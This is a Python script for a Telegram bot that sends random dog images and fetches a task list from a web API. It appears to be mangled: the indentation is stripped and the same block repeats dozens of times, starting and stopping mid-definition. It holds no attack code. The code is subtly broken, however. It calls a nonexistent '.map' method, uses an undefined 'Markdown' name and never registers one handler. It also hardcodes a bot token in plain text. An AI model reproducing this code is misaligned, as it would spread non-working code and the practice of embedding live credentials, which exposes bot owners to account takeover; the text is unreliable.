updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
